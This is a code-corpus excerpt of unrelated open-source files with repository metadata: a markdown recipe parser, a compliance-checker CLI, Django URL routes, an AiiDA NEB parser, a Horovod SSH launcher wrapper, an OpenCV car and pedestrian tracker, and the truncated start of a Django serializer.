"MIT"
] | null | null | null |
mechanical_markdown/parsers.py
|
greenie-msft/mechanical-markdown
|
4fb410a34038fab7d270383561726dd4da7a2aca
|
[
"MIT"
] | null | null | null |
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT License.
"""
import re
import yaml
from html.parser import HTMLParser
from mistune import Renderer
from mechanical_markdown.step import Step
start_token = 'STEP'
end_token = 'END_STEP'
ignore_links_token = 'IGNORE_LINKS'
end_ignore_links_token = 'END_IGNORE'
class MarkdownAnnotationError(Exception):
pass
class HTMLCommentParser(HTMLParser):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.comment_text = ""
def handle_comment(self, comment):
self.comment_text += comment
class RecipeParser(Renderer):
def __init__(self, shell, **kwargs):
super().__init__(**kwargs)
self.current_step = None
self.all_steps = []
self.external_links = []
self.ignore_links = False
self.shell = shell
def block_code(self, text, lang):
if (lang is not None and lang.strip() in ('bash', 'sh', 'shell-script', 'shell')
and self.current_step is not None):
self.current_step.add_command_block(text)
return ""
def block_html(self, text):
comment_parser = HTMLCommentParser()
comment_parser.feed(text)
comment_body = comment_parser.comment_text
if comment_body.find(end_token) >= 0:
if self.current_step is None:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_token))
self.all_steps.append(self.current_step)
self.current_step = None
return ""
elif comment_body.find(ignore_links_token) >= 0:
if self.ignore_links:
raise MarkdownAnnotationError(f"Duplicate <!-- {ignore_links_token} --> found")
self.ignore_links = True
elif comment_body.find(end_ignore_links_token) >= 0:
if not self.ignore_links:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_ignore_links_token))
self.ignore_links = False
start_pos = comment_body.find(start_token)
if start_pos < 0:
return ""
if self.current_step is not None:
raise MarkdownAnnotationError(f"<!-- {start_token} --> found while still processing previous step")
start_pos += len(start_token)
self.current_step = Step(yaml.safe_load(comment_body[start_pos:]), self.shell)
return ""
def link(self, link, text=None, title=None):
if re.match("https?://", link) is not None:
self.external_links.append((link, self.ignore_links))
| 30.034483
| 111
| 0.64026
| 309
| 2,613
| 5.148867
| 0.281553
| 0.089881
| 0.075424
| 0.035827
| 0.200503
| 0.095537
| 0
| 0
| 0
| 0
| 0
| 0.002049
| 0.252966
| 2,613
| 86
| 112
| 30.383721
| 0.813012
| 0.026024
| 0
| 0.169492
| 0
| 0
| 0.091483
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.101695
| false
| 0.016949
| 0.084746
| 0
| 0.305085
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60cb62275d3608a9262e293a2d9784988739e4b8
| 7,082
|
py
|
Python
|
cchecker.py
|
jakepolatty/compliance-checker
|
89d362c0616df0267a6a14227fdb9a05daada28e
|
[
"Apache-2.0"
] | null | null | null |
cchecker.py
|
jakepolatty/compliance-checker
|
89d362c0616df0267a6a14227fdb9a05daada28e
|
[
"Apache-2.0"
] | null | null | null |
cchecker.py
|
jakepolatty/compliance-checker
|
89d362c0616df0267a6a14227fdb9a05daada28e
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
import argparse
import sys
from compliance_checker.runner import ComplianceChecker, CheckSuite
from compliance_checker.cf.util import download_cf_standard_name_table
from compliance_checker import __version__
def main():
# Load all available checker classes
check_suite = CheckSuite()
check_suite.load_all_available_checkers()
parser = argparse.ArgumentParser()
parser.add_argument('--test', '-t', '--test=', '-t=', default=[],
action='append',
help=("Select the Checks you want to perform. Defaults to 'acdd'"
" if unspecified. Versions of standards can be specified via "
"`-t <test_standard>:<version>`. If `<version>` is omitted, or "
"is \"latest\", the latest version of the test standard is used."))
parser.add_argument('--criteria', '-c',
help=("Define the criteria for the checks. "
"Either Strict, Normal, or Lenient. Defaults to Normal."),
nargs='?', default='normal',
choices=['lenient', 'normal', 'strict'])
parser.add_argument('--verbose', '-v',
help="Increase output. May be specified up to three times.",
action="count",
default=0)
parser.add_argument('--skip-checks', '-s',
help="Specifies tests to skip",
action='append')
parser.add_argument('-f', '--format', default=[], action='append',
help=("Output format(s). Options are 'text', 'html', 'json', 'json_new'."
" The difference between the 'json' and the 'json_new'"
" formats is that the 'json' format has the check as the top level"
" key, whereas the 'json_new' format has the dataset name(s) as the"
" main key in the output follow by any checks as subkeys. Also, "
"'json' format can be only be run against one input file, whereas "
"'json_new' can be run against multiple files."))
parser.add_argument('-o', '--output', default=[], action='append',
help=("Output filename(s). If '-' is supplied, output to stdout."
" Can either be one or many files. If one file is supplied,"
" but the checker is run against many files, all the output"
" from the checks goes to that file (does not presently work "
"with 'json' format). If more than one output file is "
"supplied, the number of input datasets supplied must match "
"the number of output files."))
parser.add_argument('-V', '--version', action='store_true',
help='Display the IOOS Compliance Checker version information.')
parser.add_argument('dataset_location', nargs='*',
help="Defines the location of the dataset to be checked.")
parser.add_argument('-l', '--list-tests', action='store_true',
help='List the available tests')
parser.add_argument('-d', '--download-standard-names',
help=("Specify a version of the cf standard name table"
" to download as packaged version"))
args = parser.parse_args()
if args.version:
print("IOOS compliance checker version %s" % __version__)
return 0
if args.list_tests:
print("IOOS compliance checker available checker suites:")
for checker in sorted(check_suite.checkers.keys()):
version = getattr(check_suite.checkers[checker],
'_cc_checker_version', "???")
if args.verbose:
print(" - {} (v{})".format(checker, version))
elif ':' in checker and not checker.endswith(':latest'): # Skip the "latest" output
print(" - {}".format(checker))
return 0
if args.download_standard_names:
download_cf_standard_name_table(args.download_standard_names)
# Check the number of output files
if not args.output:
args.output = '-'
output_len = len(args.output)
if not (output_len == 1 or output_len == len(args.dataset_location)):
print('The number of output files must either be one or the same as the number of datasets', file=sys.stderr)
sys.exit(2)
# Check the output formats
format_choices = ['text', 'html', 'json', 'json_new']
for out_format in args.format:
if out_format not in format_choices:
print(("Error: argument -f/--format: invalid choice: '{}'"
" (choose from 'text', 'html', 'json', 'json_new')".format(out_format)))
sys.exit(2)
# Run the compliance checker
# 2 modes, concatenated output file or multiple output files
return_values = []
had_errors = []
if output_len == 1:
if args.format != 'json':
print("Running Compliance Checker on the datasets from: {}".format(args.dataset_location), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker(args.dataset_location,
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
args.output[0],
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
else:
for output, dataset in zip(args.output, args.dataset_location):
if args.format != 'json':
print("Running Compliance Checker on the dataset from: {}".format(dataset), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker([dataset],
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
output,
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
if any(had_errors):
return 2
if all(return_values):
return 0
return 1
if __name__ == "__main__":
sys.exit(main())
| 48.841379
| 119
| 0.515391
| 730
| 7,082
| 4.867123
| 0.256164
| 0.025331
| 0.047847
| 0.016043
| 0.192232
| 0.126091
| 0.126091
| 0.126091
| 0.126091
| 0.094005
| 0
| 0.002762
| 0.386614
| 7,082
| 144
| 120
| 49.180556
| 0.815147
| 0.031629
| 0
| 0.182609
| 0
| 0
| 0.305357
| 0.00759
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008696
| false
| 0
| 0.052174
| 0
| 0.104348
| 0.078261
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60cf079213b806efdae39b46a5d5e92189e230e8
| 1,404
|
py
|
Python
|
student/urls.py
|
rummansadik/Admission-Automation
|
a2fd305644cf60bfd0a381b855fb8c2810507f36
|
[
"MIT"
] | null | null | null |
student/urls.py
|
rummansadik/Admission-Automation
|
a2fd305644cf60bfd0a381b855fb8c2810507f36
|
[
"MIT"
] | null | null | null |
student/urls.py
|
rummansadik/Admission-Automation
|
a2fd305644cf60bfd0a381b855fb8c2810507f36
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.views import LoginView
from django.urls import path
from student import views
urlpatterns = [
path('studentclick', views.studentclick_view, name='student-click'),
path('studentlogin', LoginView.as_view(
template_name='student/studentlogin.html'), name='studentlogin'),
path('studentsignup', views.student_signup_view, name='studentsignup'),
path('student-dashboard', views.student_dashboard_view,
name='student-dashboard'),
path('student-check', views.student_check_view, name='student-check'),
path('student-exam', views.student_exam_view, name='student-exam'),
path('take-exam/<int:pk>', views.take_exam_view, name='take-exam'),
path('start-exam/<int:pk>', views.start_exam_view, name='start-exam'),
path('calculate-marks', views.calculate_marks_view, name='calculate-marks'),
path('view-result', views.view_result_view, name='view-result'),
path('check-marks/<int:pk>', views.check_marks_view, name='check-marks'),
path('student-marks', views.student_marks_view, name='student-marks'),
path('expel/<int:pk>', views.student_expel_view, name='expel'),
path('video_feed', views.video_feed, name='video-feed'),
path('train_feed', views.train_feed, name='train-feed'),
path('check_feed', views.check_feed, name='check-feed'),
path('logout', views.student_logout_view, name='student-logout'),
]
| 52
| 80
| 0.718661
| 187
| 1,404
| 5.219251
| 0.192513
| 0.106557
| 0.092213
| 0.028689
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110399
| 1,404
| 26
| 81
| 54
| 0.781425
| 0
| 0
| 0
| 0
| 0
| 0.319088
| 0.017806
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60cfe2b25e1fd15d3b1f9eec1ded9e4ee805612a
| 10,381
|
py
|
Python
|
aiida_quantumespresso/parsers/neb.py
|
lin-cp/aiida-quantumespresso
|
55f2bc8c137a69be24709a119bc285c700997907
|
[
"MIT"
] | null | null | null |
aiida_quantumespresso/parsers/neb.py
|
lin-cp/aiida-quantumespresso
|
55f2bc8c137a69be24709a119bc285c700997907
|
[
"MIT"
] | null | null | null |
aiida_quantumespresso/parsers/neb.py
|
lin-cp/aiida-quantumespresso
|
55f2bc8c137a69be24709a119bc285c700997907
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from aiida.common import NotExistent
from aiida.orm import Dict
from aiida_quantumespresso.calculations.pw import PwCalculation
from aiida_quantumespresso.parsers import QEOutputParsingError
from aiida_quantumespresso.parsers.parse_raw import convert_qe_to_aiida_structure
from aiida_quantumespresso.parsers.parse_raw.neb import parse_raw_output_neb
from aiida_quantumespresso.parsers.parse_raw.pw import parse_stdout as parse_pw_stdout
from aiida_quantumespresso.parsers.parse_raw.pw import reduce_symmetries
from aiida_quantumespresso.parsers.parse_xml.exceptions import XMLParseError, XMLUnsupportedFormatError
from aiida_quantumespresso.parsers.parse_xml.pw.parse import parse_xml as parse_pw_xml
from aiida_quantumespresso.parsers.pw import PwParser
from .base import Parser
class NebParser(Parser):
"""`Parser` implementation for the `NebCalculation` calculation job class."""
def parse(self, **kwargs):
"""Parse the retrieved files of a completed `NebCalculation` into output nodes.
Two nodes that are expected are the default 'retrieved' `FolderData` node which will store the retrieved files
permanently in the repository. The second required node is a filepath under the key `retrieved_temporary_files`
which should contain the temporary retrieved files.
"""
import os
from aiida.orm import ArrayData, TrajectoryData
import numpy
PREFIX = self.node.process_class._PREFIX
retrieved = self.retrieved
list_of_files = retrieved.list_object_names() # Note: this includes folders, but not the files they contain.
# The stdout is required for parsing
filename_stdout = self.node.get_attribute('output_filename')
if filename_stdout not in list_of_files:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
# Look for optional settings input node and potential 'parser_options' dictionary within it
# Note that we look for both NEB and PW parser options under "inputs.settings.parser_options";
# we don't even have a namespace "inputs.pw.settings".
try:
settings = self.node.inputs.settings.get_dict()
parser_options = settings[self.get_parser_settings_key()]
except (AttributeError, KeyError, NotExistent):
settings = {}
parser_options = {}
# load the pw input parameters dictionary
pw_input_dict = self.node.inputs.pw__parameters.get_dict()
# load the neb input parameters dictionary
neb_input_dict = self.node.inputs.parameters.get_dict()
# First parse the Neb output
try:
stdout = retrieved.get_object_content(filename_stdout)
neb_out_dict, iteration_data, raw_successful = parse_raw_output_neb(stdout, neb_input_dict)
# TODO: why do we ignore raw_successful ?
except (OSError, QEOutputParsingError):
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
for warn_type in ['warnings', 'parser_warnings']:
for message in neb_out_dict[warn_type]:
self.logger.warning(f'parsing NEB output: {message}')
if 'QE neb run did not reach the end of the execution.' in neb_out_dict['parser_warnings']:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_INCOMPLETE)
# Retrieve the number of images
try:
num_images = neb_input_dict['num_of_images']
except KeyError:
try:
num_images = neb_out_dict['num_of_images']
except KeyError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
if num_images < 2:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
# Now parse the information from the individual pw calculations for the different images
image_data = {}
positions = []
cells = []
# for each image...
for i in range(num_images):
# check if any of the known XML output file names are present, and parse the first that we find
relative_output_folder = os.path.join(f'{PREFIX}_{i + 1}', f'{PREFIX}.save')
retrieved_files = self.retrieved.list_object_names(relative_output_folder)
for xml_filename in PwCalculation.xml_filenames:
if xml_filename in retrieved_files:
xml_file_path = os.path.join(relative_output_folder, xml_filename)
try:
with retrieved.open(xml_file_path) as xml_file:
parsed_data_xml, logs_xml = parse_pw_xml(xml_file, None)
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_READ)
except XMLParseError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_PARSE)
except XMLUnsupportedFormatError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_FORMAT)
except Exception as exc:
import traceback
traceback.print_exc()
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
# this image is dealt with, so break the inner loop and go to the next image
break
# otherwise, if none of the filenames we tried exists, exit with an error
else:
return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)
# look for pw output and parse it
pw_out_file = os.path.join(f'{PREFIX}_{i + 1}', 'PW.out')
try:
with retrieved.open(pw_out_file, 'r') as f:
pw_out_text = f.read() # Note: read() and not readlines()
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
try:
parsed_data_stdout, logs_stdout = parse_pw_stdout(
pw_out_text, pw_input_dict, parser_options, parsed_data_xml
)
except Exception as exc:
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
parsed_structure = parsed_data_stdout.pop('structure', {})
parsed_trajectory = parsed_data_stdout.pop('trajectory', {})
parsed_parameters = PwParser.build_output_parameters(parsed_data_xml, parsed_data_stdout)
# Explicit information about k-points does not need to be queryable so we remove it from the parameters
parsed_parameters.pop('k_points', None)
parsed_parameters.pop('k_points_units', None)
parsed_parameters.pop('k_points_weights', None)
# Delete bands # TODO: this is just to make pytest happy; do we want to keep them instead?
parsed_parameters.pop('bands', None)
# Append the last frame of some of the smaller trajectory arrays to the parameters for easy querying
PwParser.final_trajectory_frame_to_parameters(parsed_parameters, parsed_trajectory)
# If the parser option 'all_symmetries' is False, we reduce the raw parsed symmetries to save space
all_symmetries = False if parser_options is None else parser_options.get('all_symmetries', False)
if not all_symmetries and 'cell' in parsed_structure:
reduce_symmetries(parsed_parameters, parsed_structure, self.logger)
structure_data = convert_qe_to_aiida_structure(parsed_structure)
key = f'pw_output_image_{i + 1}'
image_data[key] = parsed_parameters
positions.append([site.position for site in structure_data.sites])
cells.append(structure_data.cell)
# Add also PW warnings and errors to the neb output data, avoiding repetitions.
for log_type in ['warning', 'error']:
for message in logs_stdout[log_type]:
formatted_message = f'{log_type}: {message}'
if formatted_message not in neb_out_dict['warnings']:
neb_out_dict['warnings'].append(formatted_message)
# Symbols can be obtained simply from the last image
symbols = [str(site.kind_name) for site in structure_data.sites]
output_params = Dict(dict=dict(list(neb_out_dict.items()) + list(image_data.items())))
self.out('output_parameters', output_params)
trajectory = TrajectoryData()
trajectory.set_trajectory(
stepids=numpy.arange(1, num_images + 1),
cells=numpy.array(cells),
symbols=symbols,
positions=numpy.array(positions),
)
self.out('output_trajectory', trajectory)
if parser_options is not None and parser_options.get('all_iterations', False):
if iteration_data:
arraydata = ArrayData()
for k, v in iteration_data.items():
arraydata.set_array(k, numpy.array(v))
self.out('iteration_array', arraydata)
# Load the original and interpolated energy profile along the minimum-energy path (mep)
try:
filename = PREFIX + '.dat'
with retrieved.open(filename, 'r') as handle:
mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
mep = numpy.array([[]])
try:
filename = PREFIX + '.int'
with retrieved.open(filename, 'r') as handle:
interp_mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
interp_mep = numpy.array([[]])
# Create an ArrayData with the energy profiles
mep_arraydata = ArrayData()
mep_arraydata.set_array('mep', mep)
mep_arraydata.set_array('interpolated_mep', interp_mep)
self.out('output_mep', mep_arraydata)
return
@staticmethod
def get_parser_settings_key():
"""Return the key that contains the optional parser options in the `settings` input node."""
return 'parser_options'
| 47.619266
| 119
| 0.652731
| 1,269
| 10,381
| 5.117415
| 0.224586
| 0.029566
| 0.02587
| 0.033261
| 0.224361
| 0.205574
| 0.155066
| 0.133816
| 0.119341
| 0.099476
| 0
| 0.00093
| 0.275311
| 10,381
| 217
| 120
| 47.83871
| 0.862289
| 0.202485
| 0
| 0.190476
| 0
| 0
| 0.07021
| 0
| 0
| 0
| 0
| 0.004608
| 0
| 1
| 0.013605
| false
| 0
| 0.108844
| 0
| 0.22449
| 0.006803
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d008a523955b3331abaa74c2b768ea0d2cf905
| 6,942
|
py
|
Python
|
training/horovod/base/horovod_wrapper.py
|
thehardikv/ai-platform-samples
|
0050d12476bcbfdb99d9894a3755a97da5cd80fe
|
[
"Apache-2.0"
] | 418
|
2019-06-26T05:55:42.000Z
|
2022-03-31T10:46:57.000Z
|
training/horovod/base/horovod_wrapper.py
|
thehardikv/ai-platform-samples
|
0050d12476bcbfdb99d9894a3755a97da5cd80fe
|
[
"Apache-2.0"
] | 362
|
2019-06-26T20:41:17.000Z
|
2022-02-10T16:02:16.000Z
|
training/horovod/base/horovod_wrapper.py
|
thehardikv/ai-platform-samples
|
0050d12476bcbfdb99d9894a3755a97da5cd80fe
|
[
"Apache-2.0"
] | 229
|
2019-06-29T17:55:33.000Z
|
2022-03-14T15:52:58.000Z
|
import collections
import datetime
import json
import multiprocessing
import os
import subprocess
import sys
import time
_SSHD_BINARY_PATH = "/usr/sbin/sshd"
EnvironmentConfig = collections.namedtuple(
"EnvironmentConfig",
["hosts", "port", "is_chief", "pools", "job_id"])
class DeadlineExceededError(Exception):
"""Indicates an action took too long."""
pass
def _sub_process_num_gpus(unused):
del unused
# This is imported here so that we don't load tensorflow in the parent
# process. Once the sub-process exits, it releases its allocated GPU memory.
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == "GPU"]
return len(gpus)
def _get_available_gpus():
"""Returns the number of GPUs on the machine."""
pool = multiprocessing.Pool(1)
result = pool.map(_sub_process_num_gpus, [None])[0]
pool.close()
pool.join()
return result
def parse_environment_config(env_config_str, job_id):
"""Parses environment config and returns a list of hosts as well as the role.
Returns:
An EnvironmentConfig.
"""
if env_config_str:
ssh_port = -1
env_config_json = json.loads(env_config_str)
cluster = env_config_json.get("cluster")
if not cluster:
return None, True
hosts = []
pools = collections.defaultdict(list)
for pool_type, tasks_per_type in cluster.items():
if pool_type == "master":
pool_type = "chief"
for host_and_port in tasks_per_type:
host, port = host_and_port.split(":")
if host == "127.0.0.1":
host = "localhost"
port = int(port)
if ssh_port == -1:
ssh_port = port
elif ssh_port != port:
raise ValueError("Inconsistent ssh ports across tasks %d != %d." %
(ssh_port, port))
hosts.append(host)
pools[pool_type].append(host)
is_chief = False
has_chief = "chief" in pools
if (env_config_json["task"]["type"] == "master" or
env_config_json["task"]["type"] == "chief"):
is_chief = True
if int(env_config_json["task"]["index"]) != 0:
raise ValueError("Only one master node is expected.")
elif ((not has_chief) and
(env_config_json["task"]["type"] == "worker") and
int(env_config_json["task"]["index"]) == 0):
is_chief = True
pools["chief"].append(pools["worker"].pop(0))
elif env_config_json["task"]["type"] != "worker":
raise ValueError("Unexpected task type for Horovod training: %s." %
env_config_json["task"]["type"])
return EnvironmentConfig(hosts=hosts, port=port, is_chief=is_chief,
pools=pools, job_id=job_id)
else:
return EnvironmentConfig(hosts=["localhost"], port=2222, is_chief=True,
pools={"chief": ["localhost"]}, job_id=job_id)
def start_ssh_server(port, is_chief):
ssh_server_command = [_SSHD_BINARY_PATH, "-p", str(port)]
if not is_chief:
ssh_server_command.append("-D")
completed = subprocess.call(ssh_server_command)
if completed != 0:
raise OSError("SSH server did not start successfully.")
def wait_for_ssh_servers(hosts, port, timeout_seconds):
deadline_datetime = datetime.datetime.utcnow() + datetime.timedelta(
seconds=timeout_seconds)
unavailable_hosts = []
while datetime.datetime.utcnow() < deadline_datetime:
unavailable_hosts = []
for host in hosts:
ssh_command = ["ssh", "-q", host, "-p", str(port), "true"]
result = subprocess.call(ssh_command)
if result != 0:
unavailable_hosts.append(host)
if not unavailable_hosts:
return
# Retry in 1 second.
time.sleep(1)
raise DeadlineExceededError(
"Timed out while waiting for all hosts to start. "
"Hosts still not available: %s. TASK_STARTUP_TIMEOUT_SECONDS=%d" %
(unavailable_hosts, timeout_seconds))
def run_horovod(env_config, jobs_per_host, args):
env = dict(os.environ)
del env["TF_CONFIG"]
num_jobs = len(env_config.hosts) * jobs_per_host
hosts = ",".join("%s:%d" % (h, jobs_per_host) for h in env_config.hosts)
horovod_command = [
"horovodrun", "--ssh-port", str(env_config.port), "-H",
hosts, "--num-proc", str(num_jobs)
]
horovod_command.extend(args)
exit_code = subprocess.call(horovod_command, env=env)
return exit_code
def benchmark_network(env_config):
if not env_config.pools["worker"]:
raise ValueError("No workers in the pool to do network benchmarking.")
iperf_server = ["iperf", "-s", "-p", "6000"]
server = subprocess.Popen(iperf_server)
# Wait 10 seconds for the local server to start.
time.sleep(10)
iperf_command = ["ssh", "-q", env_config.pools["worker"][0], "-p",
str(env_config.port),
"iperf", "-p", "6000", "-c", env_config.pools["chief"][0]]
subprocess.call(iperf_command)
server.kill()
def copy_files_recursively(src, dest):
if not dest.startswith("gs://"):
try:
os.makedirs(dest)
except OSError:
pass
copy_cmd = ["gsutil", "-m", "rsync", "-r", src, dest]
exit_code = subprocess.call(copy_cmd)
if exit_code != 0:
raise RuntimeError("Error while copying %s to %s" % (src, dest))
return exit_code
def main():
env_config_str = os.environ.get("TF_CONFIG")
job_id = os.environ.get("CLOUD_ML_JOB_ID", "localrun")
env_config = parse_environment_config(env_config_str, job_id)
print (env_config, env_config.pools, env_config.hosts, os.environ)
if os.environ.get("STAGE_GCS_PATH", False):
copy_files_recursively(
os.environ.get("STAGE_GCS_PATH"),
os.environ.get("STAGING_DIR", "/input"))
start_ssh_server(env_config.port, env_config.is_chief)
max_num_retries = os.environ.get("NUM_HOROVOD_RETRIES", 1)
if env_config.is_chief:
exit_code = 0
for retry in range(max_num_retries):
staging_timeout_seconds = int(
os.environ.get("TASK_STARTUP_TIMEOUT_SECONDS", 600))
wait_for_ssh_servers(env_config.hosts, env_config.port,
staging_timeout_seconds)
if os.environ.get("BENCHMARK_NETWORK", False):
benchmark_network(env_config)
num_gpus = _get_available_gpus()
# If there are no GPUs, we can just run single process per machine.
jobs_per_host = max(1, num_gpus)
args = sys.argv[1:]
exit_code = run_horovod(env_config=env_config, jobs_per_host=jobs_per_host,
args=args)
if exit_code == 0:
break
else:
print ("Retrying...", retry, "out of", max_num_retries)
if os.environ.get("GCS_OUTPUT_PATH", False):
copy_files_recursively(
os.environ.get("OUTPUT_DIR", "/output"),
os.path.join(os.environ.get("GCS_OUTPUT_PATH"), job_id))
sys.exit(exit_code)
if __name__ == "__main__":
main()
| 33.699029
| 81
| 0.659896
| 951
| 6,942
| 4.569926
| 0.249211
| 0.07248
| 0.030373
| 0.027382
| 0.123102
| 0.079153
| 0.04878
| 0.036815
| 0
| 0
| 0
| 0.008069
| 0.214492
| 6,942
| 205
| 82
| 33.863415
| 0.788924
| 0.066695
| 0
| 0.072727
| 0
| 0
| 0.141662
| 0.009144
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0.012121
| 0.054545
| 0
| 0.163636
| 0.012121
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d5e102f224ce9da90306668a9ad7d31fe50111
| 1,332
|
py
|
Python
|
car & pedestrian_tracker.py
|
Ishita-2001/Car-And-Pedestrian-prediction
|
6c4aeca84ae49d40ff6d27e51800c6f50db55070
|
[
"MIT"
] | 1
|
2022-01-05T13:26:26.000Z
|
2022-01-05T13:26:26.000Z
|
car & pedestrian_tracker.py
|
Ishita-2001/Car-And-Pedestrian-prediction
|
6c4aeca84ae49d40ff6d27e51800c6f50db55070
|
[
"MIT"
] | null | null | null |
car & pedestrian_tracker.py
|
Ishita-2001/Car-And-Pedestrian-prediction
|
6c4aeca84ae49d40ff6d27e51800c6f50db55070
|
[
"MIT"
] | null | null | null |
import cv2
video=cv2.VideoCapture(r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.mp4')
# pre-trained pedestrian and car classifiers
car_tracker_file = (r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\car.xml')
pedestrian_tracker_file = (r'C:\Users\ISHITA\Desktop\ML project\UEM_PROJECT_COM\pedestrian.xml')

# create the car and pedestrian classifiers
car_tracker = cv2.CascadeClassifier(car_tracker_file)
pedestrian_tracker = cv2.CascadeClassifier(pedestrian_tracker_file)

# run until the user stops the video
while True:
    (read_successful, frame) = video.read()
    gr_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)

    # detect cars and pedestrians
    cars = car_tracker.detectMultiScale(gr_frame)
    pedestrians = pedestrian_tracker.detectMultiScale(gr_frame)

    # draw rectangles around cars
    for (x, y, w, h) in cars:
        cv2.rectangle(frame, (x+1, y+2), (x+w, y+h), (255, 0, 0), 2)
        cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 0, 255), 2)

    # draw rectangles around pedestrians
    for (x, y, w, h) in pedestrians:
        cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 255), 2)

    # display the annotated frame
    cv2.imshow('car n pedestrians', frame)
    key = cv2.waitKey(1)

    # stopping condition: press 's' or 'S'
    if key == 83 or key == 115:
        break

# release the VideoCapture object
video.release()
print('Press "s" to stop')
print('Hey!')
| 28.340426
| 94
| 0.712462
| 204
| 1,332
| 4.539216
| 0.367647
| 0.043197
| 0.022678
| 0.042117
| 0.2527
| 0.2527
| 0.233261
| 0.233261
| 0.233261
| 0.233261
| 0
| 0.036348
| 0.153153
| 1,332
| 46
| 95
| 28.956522
| 0.784574
| 0.180931
| 0
| 0
| 0
| 0
| 0.208872
| 0.17098
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.043478
| 0
| 0.043478
| 0.086957
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60d7aa6b6e26e469afd18baf5e09fc751d3bc828
| 1,658
|
py
|
Python
|
saleor/wing/api/serializers.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | 1
|
2018-05-03T06:17:02.000Z
|
2018-05-03T06:17:02.000Z
|
saleor/wing/api/serializers.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | 8
|
2018-05-07T16:42:35.000Z
|
2022-02-26T03:31:56.000Z
|
saleor/wing/api/serializers.py
|
glosoftgroup/tenants
|
a6b229ad1f6d567b7078f83425a532830b71e1bb
|
[
"BSD-3-Clause"
] | null | null | null |
# site settings rest api serializers
from rest_framework import serializers
from saleor.wing.models import Wing as Table
class TableListSerializer(serializers.ModelSerializer):
    update_url = serializers.HyperlinkedIdentityField(view_name='wing:api-update')
    delete_url = serializers.HyperlinkedIdentityField(view_name='wing:api-delete')
